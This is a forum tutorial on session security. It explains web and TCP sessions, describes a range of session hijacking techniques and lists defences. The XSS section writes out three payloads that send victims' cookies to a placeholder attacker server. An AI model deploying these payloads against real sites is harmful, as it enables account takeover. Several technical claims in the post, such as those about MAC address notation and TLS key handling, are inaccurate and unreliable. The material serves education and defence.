[EN] Session Security

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18
Written by Ekin Şiar Bayer

[EN] Session Security​


Hi, I will talk about session, session hijacking techniques applied in web applications and networks, and session hijacking prevention methods in this article.

What is Session in Web Applications?​


When we login to a website for the first time, the website will need some information to recognize us. In order to provide this information, we send a request to the website. In the response to this request, we see an HTTP Header named Set-Cookie. The cookie which set by Set-Cookie header is saved in the local database of the browser. Now, all the data we receive with Set-Cookie will be added to every request we send to the website as Cookie: data. There may be more than one Set-Cookie data from different websites in our browser’s local database. Browser will check protocol, domain and port trio to find where this data will be used.

Because of HTTP, web sessions are only examined individually by the server for each request to find whether or not they match the session value on the server. This is why web sessions are known as stateless sessions.

Cookies are kept in the browser’s local database, but they are not controlled on the server side. This situation is not the same for the session. After logging in to a website with a username and password, the session is strongly encrypted and given back to the user with Set-Cookie. While the user is navigating between the pages that require authorization, session will be added as a cookie to every request that matches the protocol, domain and port trio and the session data is checked by the web server in every request to know whether it is active or not. This control happens in the website’s folders such as /tmp or in the database. In addition, due to this situation, you cannot login to a website with the same protocol, domain and port trio from the same browser with different accounts at the same time. If the session is active, user can successfully login. Otherwise user cannot login, that means a user cannot login with a destroyed/expired session. The website recognizes the user with the session, so as long as the session is not destroyed or expired, the user does not have to enter the username and password every time. To destroy the session, you can log out of your account or wait for the session to be expired.

Except cookie-based sessions I mentioned, modern web session tokens such as JWT or session IDs for old browsers that do not support cookies and which are generally transferred by URL are also used today. Session IDs which transferred by URL can be used in parallel with each other at the same time, but they are destroyed as soon as you close the browser and they reflect to the logs because they pass through the HTTP Referrer Header, so they are not secure.

An example of outgoing request and incoming response with JSON when retrieving cookie-based session:

POST /login HTTP/1.1
Host: ekinsiarbayer.com

username=ekin&password=1234



HTTP 302 OK
Location: ekinsiarbayer.com/dashboard
Set-Cookie: SESSION={‘IV’:’RANDOM_VALUE’, ‘session_data’:[‘username’,’user_id’,’password’]}|CHECKSUM|HMAC|BASE64_ENC

‘session_data’ is encrypted with the symmetric key algorithm on the server and a checksum is assigned.Next, a signature will be created with HMAC. Then the data will be encrypted with base64 or another algorithm and we get the session data.

What is the OSI Model?​


OSI (Open Systems Interconnection) is the protocol that classifies the protocols used by devices on the network to communicate with each other. I think the image below is pretty explanatory.

osimodel0.jpg


What is TCP Session in Networks?​


Unlike HTTP, TCP (Transmission Control Protocol) tracks each request with different identifiers and not only the server, also the user plays an active role during the transfer of the identifier. That’s why TCP sessions are called Stateful Session. It is located in the transport layer, which is the 4th layer of the OSI model. Also, TCP is also known as the three-way handshake protocol. The reason why it is called by three-way handshake protocol is because:

  1. To start a session, the user sends a request to the server containing the SYN (snychronize) packet with a random value, such as SYN=7891. The value 7891 in the example is called the sequence number.
  2. Then the server sends a response to the user with SYN-ACK (snychronize-acknowledgment) packets. The return SYN value from the server is another random number and the returned ACK value from the server is “SYN value sent by the user in the first request” + “1”, such as SYN.SYN=4567 and ACK=7892.
  3. In the last step, user recognizes the response from the server and sends an ACK packet to the server with “SYN value from the server’s response” + “1”, such as ACK= 4568. Now the server and the user know each other, the session is opened and communication has started.

Some Protocols Used in Networks​


HTTP (hyper text transfer protocol) is a very important protocol. Nowadays HTTP/2 and even HTTP/3 are in use. HTTP is a structure that enables communication between the client and the server, with the client’s requests and the server’s responses. For example, we send a request to the index.html file of a website server with our browser, and the web server will probably reply with a 200 code so we can display the website’s home page. If we examine the status codes of the response returned from the server, we can reach this informations:

  • Information 1XX
  • Successful 2XX
  • redirect 3XX
  • Client Error 4XX
  • Server Error 5XX

Communication is not secure becuase the data flowing over HTTP is not encrypted but it could be secured using TLS (HTTPS). It is located in the application layer, which is the 7th layer of the OSI model. You can review the technical aspects of HTTP requests and responses with the images below.

httpresponse.png
HTTP_RequestMessageExample.png


TLS (Transport Layer Security) is the application of asymmetric encryption between communicating devices. When the user requests a secure connection from the website, the website sends the user a public key with the certificate. The user’s browser checks the public key’s certificate. The user’s browser generates a symmetric encryption key and encrypts this key with the website’s public key then sends it to the web server. The web server obtains the symmetric key by decrypting the key -which encrypted with the public key- with its own private key. After that, the server sends the data to the user with this key. Someone who does not have the key cannot listen to the communication. The keys are encrypted with algorithms such as RSA or AES. It runs in the presentation layer, which is layer 6 in the OSI model, but starts at the session layer, which is layer 5.

UDP (user datagram protocol) is a different type of protocol used in networks. It does not make any checks between the user and the server before sending and receiving data. Therefore, it is not a preferred protocol when transferring sensitive data, but it is faster than TCP. Thanks to its speed, it is also used in the transmission of data that needs to be transmitted in real time, such as audio and video also in the communication of protocols such as DNS, DHCP, TFTP. It is located in the transport layer, which is the 4th layer of the OSI model.

Telnet is a remote connection protocol similar to SSH. It is used for its flexibility. Because you can connect even different operating systems together. However, all data on Telnet goes as plain text, so it can be easily exposed to a sniffing attack by an attacker. It is located in the application layer, which is the 7th layer of the OSI model.

DNS (domain name server) is a protocol for keeping domains or hostnames assigned to IP addresses. Thanks to this protocol, instead of remembering the IP address of the website to access a website, we only need to keep the domain in mind. However, DNS queries usually do not contain any information about the user who submitted the DNS query. It is located in the application layer, which is the 7th layer of the OSI model.

IP (Internet Protocol) addresses are an identifier of a device connected to a local network or the Internet. Every protocol has to use the IP address as a parameter in order to make an accurate request and get a response back when necessary. It is used to find the address of a device on the network and without the IP address you cannot access anything on the network. The negative side is that it can easily be a target to spoofing attacks. It is located in the network layer, which is the 3rd layer of the OSI model.

MAC (Media Access Control) addresses are addresses that are integrated into the network hardware of the device and enable the device to be recognized only on the local network. They cannot be used outside the local network. They are written in this style: 01:23:45:67:89:AB, with quotation marks between them, in base 16. It is located in the data link layer, which is layer 2 in the OSI model.

ARP (Address Resolution Protocol) is the protocol that resolve IP addresses to MAC addresses. The source computer sends an ARP request to all computers in the local network to find out the MAC address of the destination computer. The source of the ARP request is the MAC address of the ARP source computer, and the MAC address of the destination of the ARP request contains the address FF:FF:FF:FF:FF:FF. FF:FF:FF:FF:FF:FF is the MAC address used for send broadcast signals to all devices on the network. After this broadcast made to all devices on the network, the device whose IP address is asked in the ARP request sends an ARP response to the router. Thus, the source and destination computers get to know each other. ARP works without authentication. It is located in the network layer, which is the 3rd layer of the OSI model.

What is Session Hijacking?​


Session hijacking is when an attacker hijacks a user’s session. When an attacker takes over a user’s session, he can do whatever he wants on behalf of the user. In this case, the attacker has two possible targets. The first is to impersonate the user by accessing the account simultaneously with the user. The second is to remove the user from the account and continue the session on his own.

What are Session Hijacking Techniques?​


Session hijacking can basically be divided into two as application level and network level.
Examples of application-level attacks:

  • Sniffing (MITM)
  • Session Fixation,
  • Session ID Brute-Force,
  • XSS
  • Session Donation
  • Man in the Browser

Examples of attacks at the network level:

  • Sniffing (MITM)
  • TCP Sequence Number Prediction
  • UDP Session Hijacking
  • IP Spoofing
  • Telnet Session Hijacking
  • DNS Session Hijacking
  • ARP Poisoning
  • SSL Strip

BurpSuite tool is usually used for application level attacks. For network-level attacks, tools such as wireshark, bettercap, arpspoof, shijack are being used.

Session Hijacking with XSS​


XSS (cross site scripting) attacks are attacks in which JavaScipt codes are injected into the website due to improperly sanitized user inputs. It is divided into three as reflected, stored and DOM.

  • Reflected XSS is reflected in the source of the page, it requires user interaction.
  • Stored XSS is written to the source of the page, it does not require user interaction.
  • DOM (Document Object Model) XSS is reflected in objects such as images, text and forms.

If the website’s sessions are cookie-based and the session cookie is not protected by the HTTP Only flag, the attacker can capture the victim’s session cookies by calling document.cookie in the XSS payload. When these conditions are met, some payloads could send the victim’s session cookies to the web server owned by the attacker. In order to perform a successful XSS to account takeover attack:

  • <script>var i=new Image;i.src=”http://ip:port/?”+document.cookie;</script>
  • <img src=x onerror=this.src=’http://ip:port/?’+document.cookie;>
  • <img src=x onerror=”this.src=’http://ip:port/?’+document.cookie; this.removeAttribute(‘onerror’);”>

Session Hijacking with Session Fixation​


Session fixation attacks occur when the application uses session ID. The vulnerability is exploited if a new session ID is not assigned when a user authenticates which results authenticating with an existing session ID. We can say that if the attacker sends the URL with his session ID to the victim and the victim completes the authentication via this address, the attacker will have access the victim’s account via session ID.

Session Hijacking with Session ID Brute-Force​


If the session ID encryption is not done properly and can be guessed, for example, if there is a session ID that indicates the current date and the session/user as an integer, an attacker can easily perform a brute force attack on the session ID, resulting in session hijacking.

Session Donation​


This technique is actually a social engineering attack using the session ID in the URL.

  1. The attacker opens an account as the name of the victim.
  2. Then the attacker deceives the victim and allows the victim to log in with one click by using the session ID in the URL to the account which attacker created on behalf of the victim.
  3. The victim thinks he/she makes all the sensitive transactions in him/her own account, but the attacker will gain access to all sensitive information of the victim because it is not actually victim’s account.

Session Hijacking with Man in the Browser​


Man in the browser is a client-side MITM attack. It aims to provide access to the user’s browser.
Common attack vectors used for this attack are:

  • Browser extensions
  • Malicious scripts
  • API hooking

When you install browser extensions on your browser, these extensions require some permissions to access your browser. If this extension contains malware, the attacker can do whatever he/she wants on the victim’s browser, within the limits of extension’s authority.

Malicious scripts can be used effectively when the attacker can simply access the source of a website or the javascript library used by the website. Examples of these situations are XSS, broken link hijacking and file upload attacks. When such a scenario is encountered, attackers usually create a payload using a tool called BeeF Framework and facilitate the operations they can do on the browser.

API hooking is when an attacker creates malicious APIs and hooks his own malicious API to the browser’s operating system process.

TCP Sequence Number Prediction​


This attack is accomplished by the attacker trying to guess the TCP sequence number and processing the guessed value into a packet. If the delivery of the processed packet was successful, that means the attacker guessed the TCP sequence number correctly, then the attacker could inject a data into this TCP connection or destroy the TCP connection using the RST flag. Older operating systems such as BSD, Windows NT 3.5 are vulnerable to this attack as they produce predictable sequence numbers. This shows that it is not a common attack nowadays.

UDP Session Hijacking​


In this attack, the attacker generates a server response and sends its to the user before the real server delivers the real response to the user.

IP Spoofing​


An IP Spoofing attack is when the attacker sends a request to the victim with an IP address that they trust/does not perceive as a threat. In order to do this, the attacker will need to change the IP address over the outgoing request. The main goal of this attack is to provide anonymity.

Telnet Session Hijacking​


Telnet does not examine which IP address the received packets come from. Therefore, it cannot check the packet from the attacker containing the victim’s IP address, and treats this packet as a packet from the victim and sends a reply. It is basically ARP Spoofing.

DNS Session Hijacking​


DNS session hijacking is an attack that redirects all DNS queries from the victim’s website to the attacker’s website by changing the DNS records of the victim’s website. It is used for phishing purposes. Common attack vectors:

  • Local DNS hijacking
  • Router DNS hijacking
  • MITM DNS hijacking
  • Stealing DNS server

Local DNS hijacking is accomplished by changing the local DNS settings (hosts file) of the user’s computer.

Router DNS hijacking is an attack that is usually applied to routers by using default credentials, and when the DNS settings of the router are changed, all devices connected to the router are affected.

MITM DNS hijacking is an attack in which the attacker enters between the DNS server and the user which results redirection to malicious websites.

When DNS servers are stolen/hacked, the attacker can change DNS records and redirect all devices connected to the DNS server to the malicious website.

ARP Spoofing​


ARP spoofing attacks are cases where the attacker poisons the ARP table where records are kept by modifying his own MAC address and matching it with the victim’s IP address. The victim thinks the attacker is the router, and the router thinks the attacker is the victim. In this case, the attacker can change/read/delete all communication between the victim and the router. It can only happen when the attacker and the victim are connected to the same network. Common attack vectors are DoS, session hijacking and MITM attacks.

SSL Strip​


It is used in MITM attacks to downgrade the HTTPS connection to HTTP. This technique can be used when an attacker is making a ARP Spoofing attack to a victim who is on a website which uses SSL/TLS. Likewise, it is a bypass method that can be also used on proxy servers or public wifi networks. The working mechanism of the technique is as follows:

  1. The victim sends an HTTPS request to the router.
  2. The attacker in the MITM state cannot read the encrypted HTTPS request, but can convert it to HTTP and send it back to the router.
  3. The router sends the HTTP request from the attacker to the web server.

Session Security in Web Applications:​

  • Session ID should not be sequent, it should be random and mixed.
  • Session ID must be alphanumeric.
  • Session ID must be too long to brute-force.
  • If the Session ID is used in the URL, the URL can be sniffed and also recorded in the logs, browser history, referrer header and search engine.
  • Using Session ID as a cookie is the safest way.
  • If Session ID is used in URL, it should be used where POST method is preferred instead of GET method.
  • Session re-use should be avoided because it may cause session fixation vulnerability.
  • Session ID must not contain any PII(personally identifiable information).
  • A new Session ID must be generated for each authentication.

Required Flags for a Secure Cookie:​

  • HTTP Only: It prevents accessing the cookies specified by scripts from browsers, so session hijacking cannot be done as a result of XSS.
  • SECURE: Allows the browser to send the cookie only over an SSL/TLS encrypted connection.
  • MAX-AGE/EXPIRE: Causes Session ID to be expired after a while.
  • SAMESITE/DOMAIN: Determines which sites have access to cookies.

Session Security in Networks:​

  • Protocols such as HTTP, FTP, IMAP/POP must be encrypted with TLS to be protected from MITM attacks.
  • SSH should be used instead of Telnet.
  • SFTP should be used instead of FTP.
  • A VPN should be used where you need to take critical security measures, such as public networks.

Other Methods You Can Prefer for Session Security:​

  • Generate new Auth Tokens instead of using Session ID for every sensitive activity.​
  • Use built-in session management implementations for frameworks such as J2EE, PHP, ASP.NET.​
  • Make sure the server only accepts user logins in specific locations for Session ID usage.​
  • In order to prevent information leakage between systems, structures such as HTML5 Web Storage API that permanently store sensitive information in the browser should not be used.​
  • Session ID should be sanitized like any other user login.​
  • If more than one cookie is used, different names should be given for each of them.​
  • The user must be re-authenticated before sensitive actions.​
  • Session ID should be linked with different data such as User-Agent or IP to prevent session hijacking.​
  • 2FA should be used.​
 
Moderatör tarafında düzenlendi:
Geri
Üst